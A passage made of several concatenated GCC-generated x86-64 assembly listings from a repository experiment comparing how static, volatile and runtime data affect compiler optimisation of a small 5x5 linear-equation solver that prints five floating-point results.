.long 2233382994
.long 1075335659
.long 2405181686
.long 1075869122
.long 343597384
.long 1072777134
.long 3779571220
.long 1075975290
.long 1374389535
.long 1073815224
.long 1202590843
.long -1071940895
.section .text.unlikely,"ax",@progbits
.LCOLDB8:
.section .text.startup,"ax",@progbits
.LHOTB8:
.p2align 4,,15
.globl main
.type main, @function
main:
.LFB22:
.cfi_startproc
subq $440, %rsp
.cfi_def_cfa_offset 448
movl $.LC0, %esi
movl $25, %ecx
movq %fs:40, %rax
movq %rax, 424(%rsp)
xorl %eax, %eax
leaq 224(%rsp), %rdi
movsd .LC1(%rip), %xmm3
rep movsq
movsd %xmm3, 176(%rsp)
movabsq $4616212136052895252, %rax
movl $.LC7, %esi
movsd .LC2(%rip), %xmm3
movl $1, %edi
pxor %xmm9, %xmm9
movsd %xmm3, 184(%rsp)
movsd .LC3(%rip), %xmm3
movsd 224(%rsp), %xmm7
movsd 264(%rsp), %xmm5
movsd %xmm7, 24(%rsp)
movsd 272(%rsp), %xmm7
movsd 304(%rsp), %xmm4
movsd %xmm5, 32(%rsp)
movsd 312(%rsp), %xmm8
movsd %xmm4, 40(%rsp)
movsd 320(%rsp), %xmm6
movsd 344(%rsp), %xmm0
movsd 352(%rsp), %xmm1
movsd 360(%rsp), %xmm13
movsd 368(%rsp), %xmm4
movsd 384(%rsp), %xmm5
movsd %xmm0, 48(%rsp)
movsd %xmm5, 8(%rsp)
movsd 392(%rsp), %xmm5
movsd %xmm3, 192(%rsp)
movapd %xmm5, %xmm0
movsd 400(%rsp), %xmm5
movsd .LC4(%rip), %xmm3
movapd %xmm5, %xmm15
movsd 408(%rsp), %xmm5
movsd %xmm3, 200(%rsp)
movapd %xmm5, %xmm12
movsd 416(%rsp), %xmm5
movsd .LC5(%rip), %xmm3
movq %rax, 128(%rsp)
movabsq $4618655338850743747, %rax
movsd %xmm12, 72(%rsp)
movq %rax, 136(%rsp)
movabsq $-4602554970182894223, %rax
movsd %xmm3, 208(%rsp)
movq %rax, 144(%rsp)
movabsq $-4603162956132589240, %rax
mulsd %xmm5, %xmm4
movq %rax, 152(%rsp)
movapd %xmm12, %xmm10
movabsq $-4609366664619292099, %rax
movapd %xmm5, %xmm12
movq %rax, 160(%rsp)
mulsd %xmm9, %xmm10
movsd %xmm15, 64(%rsp)
movsd 128(%rsp), %xmm3
movl $5, %eax
mulsd %xmm9, %xmm12
movsd %xmm0, 56(%rsp)
movsd 136(%rsp), %xmm11
movsd %xmm3, 80(%rsp)
subsd %xmm10, %xmm4
mulsd %xmm5, %xmm13
movsd 144(%rsp), %xmm2
movsd 152(%rsp), %xmm14
movsd 160(%rsp), %xmm3
mulsd %xmm5, %xmm6
movsd %xmm3, 16(%rsp)
movapd %xmm12, %xmm3
subsd %xmm10, %xmm12
movapd %xmm15, %xmm10
movapd %xmm3, %xmm15
mulsd %xmm9, %xmm0
mulsd %xmm9, %xmm10
mulsd %xmm5, %xmm1
mulsd %xmm5, %xmm8
mulsd %xmm5, %xmm7
subsd %xmm0, %xmm3
subsd %xmm10, %xmm15
mulsd %xmm5, %xmm14
subsd %xmm10, %xmm13
mulsd %xmm5, %xmm2
subsd %xmm10, %xmm6
subsd %xmm0, %xmm1
mulsd %xmm4, %xmm3
movapd %xmm15, %xmm10
movapd %xmm11, %xmm15
movsd %xmm13, 96(%rsp)
subsd %xmm0, %xmm8
mulsd %xmm12, %xmm13
mulsd %xmm4, %xmm6
subsd %xmm0, %xmm7
mulsd %xmm4, %xmm10
movsd %xmm1, 88(%rsp)
mulsd %xmm5, %xmm15
mulsd %xmm12, %xmm1
subsd %xmm13, %xmm6
mulsd %xmm4, %xmm8
subsd %xmm13, %xmm10
mulsd %xmm4, %xmm7
movsd 16(%rsp), %xmm13
subsd %xmm1, %xmm3
movsd 80(%rsp), %xmm0
mulsd %xmm9, %xmm13
subsd %xmm1, %xmm8
subsd %xmm1, %xmm7
movapd %xmm15, %xmm1
mulsd %xmm5, %xmm0
mulsd %xmm6, %xmm3
subsd %xmm13, %xmm14
movsd %xmm8, 104(%rsp)
mulsd %xmm10, %xmm8
subsd %xmm13, %xmm2
mulsd %xmm6, %xmm7
subsd %xmm13, %xmm1
mulsd 8(%rsp), %xmm9
subsd %xmm13, %xmm0
movsd 48(%rsp), %xmm11
movsd %xmm14, 112(%rsp)
mulsd %xmm12, %xmm14
subsd %xmm8, %xmm3
mulsd %xmm4, %xmm2
subsd %xmm8, %xmm7
mulsd %xmm4, %xmm1
mulsd %xmm4, %xmm0
movsd 40(%rsp), %xmm8
subsd %xmm14, %xmm2
mulsd %xmm5, %xmm11
subsd %xmm14, %xmm1
mulsd %xmm5, %xmm8
subsd %xmm14, %xmm0
movsd 24(%rsp), %xmm14
movsd %xmm2, 120(%rsp)
mulsd %xmm10, %xmm2
subsd %xmm9, %xmm11
mulsd %xmm6, %xmm1
subsd %xmm9, %xmm8
mulsd %xmm5, %xmm14
mulsd %xmm6, %xmm0
movapd %xmm2, %xmm15
mulsd %xmm11, %xmm12
subsd %xmm2, %xmm1
movsd 32(%rsp), %xmm2
movapd %xmm14, %xmm13
mulsd %xmm4, %xmm8
mulsd %xmm5, %xmm2
subsd %xmm15, %xmm0
subsd %xmm9, %xmm13
movapd %xmm3, %xmm15
subsd %xmm12, %xmm8
mulsd %xmm1, %xmm15
subsd %xmm9, %xmm2
mulsd %xmm7, %xmm0
mulsd %xmm4, %xmm13
mulsd %xmm8, %xmm10
mulsd %xmm4, %xmm2
subsd %xmm15, %xmm0
subsd %xmm12, %xmm13
subsd %xmm12, %xmm2
mulsd %xmm6, %xmm13
mulsd %xmm6, %xmm2
subsd %xmm10, %xmm13
subsd %xmm10, %xmm2
mulsd %xmm7, %xmm13
mulsd %xmm2, %xmm3
subsd %xmm3, %xmm13
movsd 104(%rsp), %xmm3
divsd %xmm13, %xmm0
mulsd %xmm0, %xmm2
mulsd %xmm0, %xmm8
mulsd %xmm0, %xmm11
subsd %xmm2, %xmm1
movsd 120(%rsp), %xmm2
subsd %xmm8, %xmm2
divsd %xmm7, %xmm1
mulsd %xmm1, %xmm3
subsd %xmm3, %xmm2
movsd 112(%rsp), %xmm3
subsd %xmm11, %xmm3
divsd %xmm6, %xmm2
movsd 88(%rsp), %xmm6
movsd 16(%rsp), %xmm13
mulsd %xmm1, %xmm6
subsd %xmm6, %xmm3
movsd 96(%rsp), %xmm6
mulsd %xmm2, %xmm6
subsd %xmm6, %xmm3
movsd 56(%rsp), %xmm6
mulsd %xmm1, %xmm6
divsd %xmm4, %xmm3
movsd 8(%rsp), %xmm4
mulsd %xmm0, %xmm4
subsd %xmm4, %xmm13
movapd %xmm13, %xmm4
subsd %xmm6, %xmm4
movsd 64(%rsp), %xmm6
mulsd %xmm2, %xmm6
subsd %xmm6, %xmm4
movsd 72(%rsp), %xmm6
mulsd %xmm3, %xmm6
subsd %xmm6, %xmm4
divsd %xmm5, %xmm4
call __printf_chk
movq 424(%rsp), %rdx
xorq %fs:40, %rdx
jne .L5
xorl %eax, %eax
addq $440, %rsp
.cfi_remember_state
.cfi_def_cfa_offset 8
ret
.L5:
.cfi_restore_state
call __stack_chk_fail
.cfi_endproc
.LFE22:
.size main, .-main
.section .text.unlikely
.LCOLDE8:
.section .text.startup
.LHOTE8:
.section .rodata.cst8,"aM",@progbits,8
.align 8
.LC1:
.long 3779571220
.long 1074795642
.align 8
.LC2:
.long 1546188227
.long 1075364495
.align 8
.LC3:
.long 3607772529
.long -1071615837
.align 8
.LC4:
.long 343597384
.long -1071757394
.align 8
.LC5:
.long 2748779069
.long -1073201808
.ident "GCC: (Ubuntu 5.4.1-2ubuntu1~16.04) 5.4.1 20160904"
.section .note.GNU-stack,"",@progbits
|
akalenuk/wordsandbuttons
| 8,297
|
exp/static_c/exp/intel_asm/exp_volatile_a_b.s
|
.file "exp_volatile_a_b.c"
.section .rodata.str1.1,"aMS",@progbits,1
.LC6:
.string "%f, %f, %f, %f, %f\n"
.section .rodata
.align 32
.LC0:
.long 858993459
.long 1075524403
.long 858993459
.long -1072155853
.long 3435973837
.long -1076048692
.long 171798692
.long 1075880919
.long 1030792151
.long -1071425782
.long 2920577761
.long -1073684153
.long 1717986918
.long -1073060250
.long 171798692
.long 1074045911
.long 2061584302
.long 1074114068
.long 687194767
.long -1072394404
.long 171798692
.long 1075225559
.long 3607772529
.long 1075146915
.long 2576980378
.long -1073374823
.long 1717986918
.long 1074882150
.long 1889785610
.long -1071838659
.long 2920577761
.long 1075306823
.long 1546188227
.long -1072577905
.long 343597384
.long 1070679982
.long 2061584302
.long -1071862252
.long 2233382994
.long 1075335659
.long 2405181686
.long 1075869122
.long 343597384
.long 1072777134
.long 3779571220
.long 1075975290
.long 1374389535
.long 1073815224
.long 1202590843
.long -1071940895
.section .text.unlikely,"ax",@progbits
.LCOLDB7:
.section .text.startup,"ax",@progbits
.LHOTB7:
.p2align 4,,15
.globl main
.type main, @function
main:
.LFB22:
.cfi_startproc
subq $472, %rsp
.cfi_def_cfa_offset 480
movl $.LC0, %esi
movl $25, %ecx
movq %fs:40, %rax
movq %rax, 456(%rsp)
xorl %eax, %eax
leaq 256(%rsp), %rdi
movabsq $4616212136052895252, %rax
rep movsq
movl $.LC6, %esi
movl $1, %edi
movsd 256(%rsp), %xmm3
movsd 264(%rsp), %xmm5
movsd 272(%rsp), %xmm7
movsd 280(%rsp), %xmm4
movsd %xmm7, 104(%rsp)
movsd 288(%rsp), %xmm7
movsd 296(%rsp), %xmm0
movsd %xmm7, 32(%rsp)
movsd 304(%rsp), %xmm10
movsd 312(%rsp), %xmm9
movsd 320(%rsp), %xmm11
movsd 328(%rsp), %xmm13
movsd 336(%rsp), %xmm2
movsd 344(%rsp), %xmm1
movsd 352(%rsp), %xmm7
movsd 360(%rsp), %xmm12
movsd 368(%rsp), %xmm8
movsd 376(%rsp), %xmm14
movsd %xmm3, 88(%rsp)
movsd 384(%rsp), %xmm6
movsd %xmm5, 96(%rsp)
movsd %xmm4, 112(%rsp)
movsd %xmm2, 128(%rsp)
movsd %xmm8, 8(%rsp)
movsd 392(%rsp), %xmm2
movsd %xmm14, 136(%rsp)
movsd 400(%rsp), %xmm4
movsd %xmm0, 120(%rsp)
movsd 408(%rsp), %xmm0
movsd 416(%rsp), %xmm3
movsd %xmm3, 16(%rsp)
movsd 424(%rsp), %xmm3
movsd 432(%rsp), %xmm5
movsd 440(%rsp), %xmm15
movsd %xmm5, 40(%rsp)
movapd %xmm15, %xmm8
movsd .LC1(%rip), %xmm15
movsd 448(%rsp), %xmm5
movsd %xmm15, 208(%rsp)
movq %rax, 160(%rsp)
movabsq $4618655338850743747, %rax
movsd .LC2(%rip), %xmm15
movq %rax, 168(%rsp)
movabsq $-4602554970182894223, %rax
mulsd %xmm5, %xmm4
movsd %xmm8, 48(%rsp)
movsd %xmm15, 216(%rsp)
movq %rax, 176(%rsp)
movabsq $-4603162956132589240, %rax
movsd .LC3(%rip), %xmm15
movq %rax, 184(%rsp)
mulsd %xmm0, %xmm8
movabsq $-4609366664619292099, %rax
movsd %xmm15, 224(%rsp)
movq %rax, 192(%rsp)
mulsd %xmm5, %xmm11
movsd .LC4(%rip), %xmm15
movl $5, %eax
movsd %xmm3, 24(%rsp)
mulsd %xmm5, %xmm6
movsd %xmm15, 232(%rsp)
subsd %xmm8, %xmm4
mulsd %xmm5, %xmm12
movsd .LC5(%rip), %xmm15
mulsd %xmm5, %xmm2
movsd %xmm15, 240(%rsp)
mulsd %xmm5, %xmm7
movsd 160(%rsp), %xmm15
movsd 168(%rsp), %xmm14
movsd %xmm15, 144(%rsp)
mulsd %xmm5, %xmm9
movsd 176(%rsp), %xmm15
movsd %xmm14, 152(%rsp)
mulsd %xmm5, %xmm1
movsd 184(%rsp), %xmm3
movsd 192(%rsp), %xmm14
movsd 48(%rsp), %xmm8
mulsd %xmm5, %xmm10
mulsd %xmm13, %xmm8
mulsd %xmm5, %xmm3
mulsd %xmm5, %xmm15
subsd %xmm8, %xmm11
movsd 24(%rsp), %xmm8
mulsd %xmm0, %xmm8
subsd %xmm8, %xmm6
movsd 40(%rsp), %xmm8
movsd %xmm6, 56(%rsp)
movsd 48(%rsp), %xmm6
mulsd 8(%rsp), %xmm6
subsd %xmm6, %xmm12
movapd %xmm8, %xmm6
mulsd %xmm0, %xmm6
subsd %xmm6, %xmm2
movapd %xmm8, %xmm6
movsd %xmm2, 64(%rsp)
movsd 8(%rsp), %xmm2
mulsd %xmm8, %xmm2
movsd 64(%rsp), %xmm8
subsd %xmm2, %xmm7
movapd %xmm8, %xmm2
mulsd %xmm12, %xmm2
mulsd %xmm4, %xmm7
subsd %xmm2, %xmm7
movapd %xmm6, %xmm2
movsd 56(%rsp), %xmm6
mulsd %xmm13, %xmm2
subsd %xmm2, %xmm9
movapd %xmm8, %xmm2
movsd 24(%rsp), %xmm8
mulsd %xmm11, %xmm2
mulsd %xmm4, %xmm9
subsd %xmm2, %xmm9
movsd 8(%rsp), %xmm2
mulsd %xmm8, %xmm2
subsd %xmm2, %xmm1
movapd %xmm6, %xmm2
mulsd %xmm12, %xmm2
mulsd %xmm4, %xmm1
subsd %xmm2, %xmm1
movapd %xmm8, %xmm2
mulsd %xmm13, %xmm2
movsd %xmm1, 72(%rsp)
movapd %xmm10, %xmm1
movapd %xmm6, %xmm10
subsd %xmm2, %xmm1
movsd 32(%rsp), %xmm6
mulsd %xmm11, %xmm10
movapd %xmm15, %xmm2
movsd 8(%rsp), %xmm15
mulsd %xmm4, %xmm1
mulsd %xmm14, %xmm15
subsd %xmm10, %xmm1
movsd 72(%rsp), %xmm10
subsd %xmm15, %xmm2
movapd %xmm12, %xmm15
mulsd %xmm9, %xmm10
mulsd %xmm7, %xmm1
mulsd %xmm4, %xmm2
subsd %xmm10, %xmm1
movsd 112(%rsp), %xmm10
mulsd %xmm5, %xmm10
movsd %xmm1, 80(%rsp)
movsd 48(%rsp), %xmm1
mulsd %xmm6, %xmm1
subsd %xmm1, %xmm10
movapd %xmm14, %xmm1
mulsd %xmm0, %xmm1
subsd %xmm1, %xmm3
movsd 104(%rsp), %xmm1
mulsd %xmm5, %xmm1
mulsd %xmm3, %xmm15
movapd %xmm1, %xmm8
movsd 40(%rsp), %xmm1
subsd %xmm15, %xmm2
movsd 96(%rsp), %xmm15
mulsd %xmm6, %xmm1
movsd %xmm14, 96(%rsp)
mulsd %xmm5, %xmm15
mulsd %xmm13, %xmm14
subsd %xmm1, %xmm8
movsd 64(%rsp), %xmm1
movapd %xmm15, %xmm6
mulsd %xmm10, %xmm1
movsd 72(%rsp), %xmm15
mulsd %xmm4, %xmm8
subsd %xmm1, %xmm8
movsd 32(%rsp), %xmm1
mulsd 24(%rsp), %xmm1
mulsd %xmm8, %xmm15
subsd %xmm1, %xmm6
movsd 56(%rsp), %xmm1
mulsd %xmm10, %xmm1
mulsd %xmm4, %xmm6
subsd %xmm1, %xmm6
movsd 152(%rsp), %xmm1
mulsd %xmm5, %xmm1
mulsd %xmm7, %xmm6
subsd %xmm14, %xmm1
movsd 16(%rsp), %xmm14
subsd %xmm15, %xmm6
movapd %xmm11, %xmm15
mulsd %xmm14, %xmm0
mulsd %xmm3, %xmm15
mulsd %xmm4, %xmm1
subsd %xmm15, %xmm1
movapd %xmm9, %xmm15
mulsd %xmm2, %xmm15
mulsd %xmm7, %xmm1
subsd %xmm15, %xmm1
movsd 136(%rsp), %xmm15
mulsd %xmm5, %xmm15
subsd %xmm0, %xmm15
movsd 128(%rsp), %xmm0
mulsd 8(%rsp), %xmm14
mulsd %xmm5, %xmm0
mulsd 16(%rsp), %xmm13
mulsd %xmm15, %xmm12
mulsd %xmm15, %xmm11
subsd %xmm14, %xmm0
movsd 96(%rsp), %xmm14
mulsd %xmm4, %xmm0
subsd %xmm12, %xmm0
movapd %xmm0, %xmm12
movsd 120(%rsp), %xmm0
mulsd %xmm12, %xmm9
mulsd %xmm5, %xmm0
subsd %xmm13, %xmm0
movsd 32(%rsp), %xmm13
mulsd %xmm4, %xmm0
subsd %xmm11, %xmm0
movapd %xmm0, %xmm11
movsd 144(%rsp), %xmm0
mulsd %xmm7, %xmm11
mulsd %xmm5, %xmm0
subsd %xmm9, %xmm11
movapd %xmm13, %xmm9
mulsd 16(%rsp), %xmm13
mulsd %xmm14, %xmm9
subsd %xmm9, %xmm0
movapd %xmm10, %xmm9
mulsd %xmm15, %xmm10
mulsd %xmm3, %xmm9
mulsd %xmm4, %xmm0
subsd %xmm9, %xmm0
movapd %xmm8, %xmm9
mulsd %xmm12, %xmm8
mulsd %xmm2, %xmm9
mulsd %xmm7, %xmm0
subsd %xmm9, %xmm0
movapd %xmm6, %xmm9
mulsd %xmm11, %xmm6
mulsd %xmm1, %xmm9
mulsd 80(%rsp), %xmm0
subsd %xmm9, %xmm0
movsd 88(%rsp), %xmm9
mulsd %xmm5, %xmm9
subsd %xmm13, %xmm9
movsd 72(%rsp), %xmm13
mulsd %xmm4, %xmm9
subsd %xmm10, %xmm9
movsd 80(%rsp), %xmm10
mulsd %xmm7, %xmm9
subsd %xmm8, %xmm9
mulsd %xmm10, %xmm9
subsd %xmm6, %xmm9
movsd 24(%rsp), %xmm6
divsd %xmm9, %xmm0
mulsd %xmm0, %xmm11
mulsd %xmm0, %xmm12
mulsd %xmm0, %xmm15
subsd %xmm11, %xmm1
subsd %xmm12, %xmm2
subsd %xmm15, %xmm3
divsd %xmm10, %xmm1
mulsd %xmm1, %xmm13
mulsd %xmm1, %xmm6
subsd %xmm13, %xmm2
divsd %xmm7, %xmm2
movsd 56(%rsp), %xmm7
mulsd %xmm1, %xmm7
subsd %xmm7, %xmm3
movsd 64(%rsp), %xmm7
mulsd %xmm2, %xmm7
subsd %xmm7, %xmm3
divsd %xmm4, %xmm3
movsd 16(%rsp), %xmm4
mulsd %xmm0, %xmm4
subsd %xmm4, %xmm14
movapd %xmm14, %xmm4
subsd %xmm6, %xmm4
movsd 40(%rsp), %xmm6
mulsd %xmm2, %xmm6
subsd %xmm6, %xmm4
movsd 48(%rsp), %xmm6
mulsd %xmm3, %xmm6
subsd %xmm6, %xmm4
divsd %xmm5, %xmm4
call __printf_chk
movq 456(%rsp), %rdx
xorq %fs:40, %rdx
jne .L5
xorl %eax, %eax
addq $472, %rsp
.cfi_remember_state
.cfi_def_cfa_offset 8
ret
.L5:
.cfi_restore_state
call __stack_chk_fail
.cfi_endproc
.LFE22:
.size main, .-main
.section .text.unlikely
.LCOLDE7:
.section .text.startup
.LHOTE7:
.section .rodata.cst8,"aM",@progbits,8
.align 8
.LC1:
.long 3779571220
.long 1074795642
.align 8
.LC2:
.long 1546188227
.long 1075364495
.align 8
.LC3:
.long 3607772529
.long -1071615837
.align 8
.LC4:
.long 343597384
.long -1071757394
.align 8
.LC5:
.long 2748779069
.long -1073201808
.ident "GCC: (Ubuntu 5.4.1-2ubuntu1~16.04) 5.4.1 20160904"
.section .note.GNU-stack,"",@progbits
|
akalenuk/wordsandbuttons
| 1,084
|
exp/static_c/exp/intel_asm/exp_static_a_b.s
|
.file "exp_static_a_b.c"
.section .rodata.str1.1,"aMS",@progbits,1
.LC6:
.string "%f, %f, %f, %f, %f\n"
.section .text.unlikely,"ax",@progbits
.LCOLDB7:
.section .text.startup,"ax",@progbits
.LHOTB7:
.p2align 4,,15
.globl main
.type main, @function
main:
.LFB22:
.cfi_startproc
subq $8, %rsp
.cfi_def_cfa_offset 16
movl $.LC6, %esi
movl $1, %edi
movsd .LC1(%rip), %xmm4
movl $5, %eax
movsd .LC2(%rip), %xmm3
movsd .LC3(%rip), %xmm2
movsd .LC4(%rip), %xmm1
movsd .LC5(%rip), %xmm0
call __printf_chk
xorl %eax, %eax
addq $8, %rsp
.cfi_def_cfa_offset 8
ret
.cfi_endproc
.LFE22:
.size main, .-main
.section .text.unlikely
.LCOLDE7:
.section .text.startup
.LHOTE7:
.section .rodata.cst8,"aM",@progbits,8
.align 8
.LC1:
.long 3174655768
.long 1071782572
.align 8
.LC2:
.long 3230994035
.long 1073030601
.align 8
.LC3:
.long 83248120
.long 1071841626
.align 8
.LC4:
.long 232640199
.long -1075429521
.align 8
.LC5:
.long 87906252
.long -1075208333
.ident "GCC: (Ubuntu 5.4.1-2ubuntu1~16.04) 5.4.1 20160904"
.section .note.GNU-stack,"",@progbits
|
akalenuk/wordsandbuttons
| 4,848
|
exp/static_c/exp/intel_asm/exp_static_a_volatile_b.s
|
.file "exp_static_a_volatile_b.c"
.section .rodata.str1.1,"aMS",@progbits,1
.LC31:
.string "%f, %f, %f, %f, %f\n"
.section .text.unlikely,"ax",@progbits
.LCOLDB32:
.section .text.startup,"ax",@progbits
.LHOTB32:
.p2align 4,,15
.globl main
.type main, @function
main:
.LFB22:
.cfi_startproc
subq $104, %rsp
.cfi_def_cfa_offset 112
movl $.LC31, %esi
movl $1, %edi
movsd .LC1(%rip), %xmm5
movq %fs:40, %rax
movq %rax, 88(%rsp)
xorl %eax, %eax
movsd %xmm5, 48(%rsp)
movabsq $4616212136052895252, %rax
movsd .LC2(%rip), %xmm5
movq %rax, (%rsp)
movabsq $4618655338850743747, %rax
movq %rax, 8(%rsp)
movabsq $-4602554970182894223, %rax
movsd %xmm5, 56(%rsp)
movq %rax, 16(%rsp)
movabsq $-4603162956132589240, %rax
movsd .LC3(%rip), %xmm5
movq %rax, 24(%rsp)
movabsq $-4609366664619292099, %rax
movsd .LC7(%rip), %xmm6
movsd %xmm5, 64(%rsp)
movq %rax, 32(%rsp)
movl $5, %eax
movsd .LC4(%rip), %xmm5
movsd (%rsp), %xmm0
movsd %xmm5, 72(%rsp)
movsd .LC5(%rip), %xmm5
movsd 8(%rsp), %xmm1
movsd %xmm5, 80(%rsp)
movsd 16(%rsp), %xmm2
movsd .LC6(%rip), %xmm5
movsd 24(%rsp), %xmm3
movsd 32(%rsp), %xmm4
mulsd %xmm5, %xmm3
mulsd %xmm4, %xmm6
mulsd %xmm5, %xmm2
movsd .LC10(%rip), %xmm7
mulsd %xmm5, %xmm1
subsd %xmm6, %xmm3
movsd .LC8(%rip), %xmm6
movsd .LC14(%rip), %xmm8
mulsd %xmm4, %xmm6
mulsd %xmm5, %xmm0
mulsd %xmm3, %xmm7
subsd %xmm6, %xmm2
movsd .LC9(%rip), %xmm6
mulsd %xmm6, %xmm2
subsd %xmm7, %xmm2
movsd .LC11(%rip), %xmm7
mulsd %xmm4, %xmm7
mulsd %xmm2, %xmm8
subsd %xmm7, %xmm1
movsd .LC12(%rip), %xmm7
mulsd %xmm3, %xmm7
mulsd %xmm6, %xmm1
subsd %xmm7, %xmm1
movsd .LC13(%rip), %xmm7
mulsd %xmm7, %xmm1
subsd %xmm8, %xmm1
movsd .LC15(%rip), %xmm8
mulsd %xmm4, %xmm8
subsd %xmm8, %xmm0
movsd .LC16(%rip), %xmm8
movsd .LC19(%rip), %xmm9
mulsd %xmm3, %xmm8
mulsd %xmm1, %xmm9
mulsd %xmm6, %xmm0
subsd %xmm8, %xmm0
movsd .LC17(%rip), %xmm8
mulsd %xmm2, %xmm8
mulsd %xmm7, %xmm0
subsd %xmm8, %xmm0
movsd .LC18(%rip), %xmm8
mulsd %xmm8, %xmm0
subsd %xmm9, %xmm0
movsd .LC21(%rip), %xmm9
divsd .LC20(%rip), %xmm0
mulsd %xmm0, %xmm9
subsd %xmm9, %xmm1
divsd %xmm8, %xmm1
movsd .LC22(%rip), %xmm8
mulsd %xmm0, %xmm8
subsd %xmm8, %xmm2
movsd .LC23(%rip), %xmm8
mulsd %xmm1, %xmm8
subsd %xmm8, %xmm2
divsd %xmm7, %xmm2
movsd .LC24(%rip), %xmm7
mulsd %xmm0, %xmm7
subsd %xmm7, %xmm3
movsd .LC25(%rip), %xmm7
mulsd %xmm1, %xmm7
subsd %xmm7, %xmm3
movsd .LC26(%rip), %xmm7
mulsd %xmm2, %xmm7
subsd %xmm7, %xmm3
divsd %xmm6, %xmm3
movsd .LC27(%rip), %xmm6
mulsd %xmm0, %xmm6
subsd %xmm6, %xmm4
movsd .LC28(%rip), %xmm6
mulsd %xmm1, %xmm6
subsd %xmm6, %xmm4
movsd .LC29(%rip), %xmm6
mulsd %xmm2, %xmm6
subsd %xmm6, %xmm4
movsd .LC30(%rip), %xmm6
mulsd %xmm3, %xmm6
subsd %xmm6, %xmm4
divsd %xmm5, %xmm4
call __printf_chk
movq 88(%rsp), %rdx
xorq %fs:40, %rdx
jne .L5
xorl %eax, %eax
addq $104, %rsp
.cfi_remember_state
.cfi_def_cfa_offset 8
ret
.L5:
.cfi_restore_state
call __stack_chk_fail
.cfi_endproc
.LFE22:
.size main, .-main
.section .text.unlikely
.LCOLDE32:
.section .text.startup
.LHOTE32:
.section .rodata.cst8,"aM",@progbits,8
.align 8
.LC1:
.long 3779571220
.long 1074795642
.align 8
.LC2:
.long 1546188227
.long 1075364495
.align 8
.LC3:
.long 3607772529
.long -1071615837
.align 8
.LC4:
.long 343597384
.long -1071757394
.align 8
.LC5:
.long 2748779069
.long -1073201808
.align 8
.LC6:
.long 1202590843
.long -1071940895
.align 8
.LC7:
.long 2233382994
.long 1075335659
.align 8
.LC8:
.long 1889785610
.long -1071838659
.align 8
.LC9:
.long 3717723691
.long 1078075283
.align 8
.LC10:
.long 700938662
.long -1070812614
.align 8
.LC11:
.long 687194767
.long -1072394404
.align 8
.LC12:
.long 886481250
.long -1071744785
.align 8
.LC13:
.long 3276258777
.long 1084323836
.align 8
.LC14:
.long 236911768
.long 1082328925
.align 8
.LC15:
.long 1030792151
.long -1071425782
.align 8
.LC16:
.long 54975582
.long -1069401224
.align 8
.LC17:
.long 2483137056
.long 1083368220
.align 8
.LC18:
.long 2185392678
.long 1095227578
.align 8
.LC19:
.long 1087982832
.long 1096468689
.align 8
.LC20:
.long 3523332949
.long -1027562791
.align 8
.LC21:
.long 2081240824
.long 1095358424
.align 8
.LC22:
.long 1742044232
.long -1065275150
.align 8
.LC23:
.long 2449623945
.long -1064953704
.align 8
.LC24:
.long 3793315116
.long -1068055720
.align 8
.LC25:
.long 3910138227
.long 1077407671
.align 8
.LC26:
.long 2150919621
.long -1068734281
.align 8
.LC27:
.long 2405181686
.long 1075869122
.align 8
.LC28:
.long 343597384
.long 1072777134
.align 8
.LC29:
.long 3779571220
.long 1075975290
.align 8
.LC30:
.long 1374389535
.long 1073815224
.ident "GCC: (Ubuntu 5.4.1-2ubuntu1~16.04) 5.4.1 20160904"
.section .note.GNU-stack,"",@progbits
|
akalenuk/wordsandbuttons
| 10,386
|
exp/static_c/exp/intel_asm/exp_runtime.s
|
.file "exp_runtime.c"
.section .text.unlikely,"ax",@progbits
.LCOLDB1:
.text
.LHOTB1:
.p2align 4,,15
.globl aijn
.type aijn, @function
aijn:
.LFB12:
.cfi_startproc
cmpl %r9d, %r8d
je .L5
jmp aijn.part.0
.p2align 4,,10
.p2align 3
.L5:
imull %edx, %r8d
addl %r8d, %ecx
movslq %ecx, %rcx
movsd (%rdi,%rcx,8), %xmm0
ret
.cfi_endproc
.LFE12:
.size aijn, .-aijn
.section .text.unlikely
.LCOLDE1:
.text
.LHOTE1:
.section .text.unlikely
.LCOLDB2:
.text
.LHOTB2:
.p2align 4,,15
.type aijn.part.0, @function
aijn.part.0:
.LFB17:
.cfi_startproc
pushq %r15
.cfi_def_cfa_offset 16
.cfi_offset 15, -16
pushq %r14
.cfi_def_cfa_offset 24
.cfi_offset 14, -24
movl %r9d, %r14d
pushq %r13
.cfi_def_cfa_offset 32
.cfi_offset 13, -32
leal 1(%r8), %r13d
pushq %r12
.cfi_def_cfa_offset 40
.cfi_offset 12, -40
pushq %rbp
.cfi_def_cfa_offset 48
.cfi_offset 6, -48
pushq %rbx
.cfi_def_cfa_offset 56
.cfi_offset 3, -56
movq %rdi, %rbp
movl %r8d, %ebx
movq %rsi, %r12
movl %r13d, %r8d
subq $40, %rsp
.cfi_def_cfa_offset 96
movl %ecx, %r15d
movl %edx, 28(%rsp)
call aijn
movl %r14d, %r9d
movl %r13d, %r8d
movl %ebx, %ecx
movl %ebx, %edx
movq %r12, %rsi
movq %rbp, %rdi
movsd %xmm0, 8(%rsp)
call aijn
movsd 8(%rsp), %xmm1
movl %r14d, %r9d
movl 28(%rsp), %eax
movl %r13d, %r8d
movl %ebx, %ecx
mulsd %xmm0, %xmm1
movq %r12, %rsi
movq %rbp, %rdi
movl %eax, %edx
movsd %xmm1, 16(%rsp)
call aijn
movl %r14d, %r9d
movl %r13d, %r8d
movl %r15d, %ecx
movl %ebx, %edx
movq %r12, %rsi
movq %rbp, %rdi
movsd %xmm0, 8(%rsp)
call aijn
mulsd 8(%rsp), %xmm0
movsd 16(%rsp), %xmm1
addq $40, %rsp
.cfi_def_cfa_offset 56
popq %rbx
.cfi_def_cfa_offset 48
popq %rbp
.cfi_def_cfa_offset 40
popq %r12
.cfi_def_cfa_offset 32
popq %r13
.cfi_def_cfa_offset 24
subsd %xmm0, %xmm1
popq %r14
.cfi_def_cfa_offset 16
popq %r15
.cfi_def_cfa_offset 8
movapd %xmm1, %xmm0
ret
.cfi_endproc
.LFE17:
.size aijn.part.0, .-aijn.part.0
.section .text.unlikely
.LCOLDE2:
.text
.LHOTE2:
.section .text.unlikely
.LCOLDB3:
.text
.LHOTB3:
.p2align 4,,15
.globl bin
.type bin, @function
bin:
.LFB13:
.cfi_startproc
cmpl %r8d, %ecx
je .L15
pushq %r15
.cfi_def_cfa_offset 16
.cfi_offset 15, -16
leal 1(%rcx), %r15d
pushq %r14
.cfi_def_cfa_offset 24
.cfi_offset 14, -24
pushq %r13
.cfi_def_cfa_offset 32
.cfi_offset 13, -32
pushq %r12
.cfi_def_cfa_offset 40
.cfi_offset 12, -40
movq %rsi, %r14
pushq %rbp
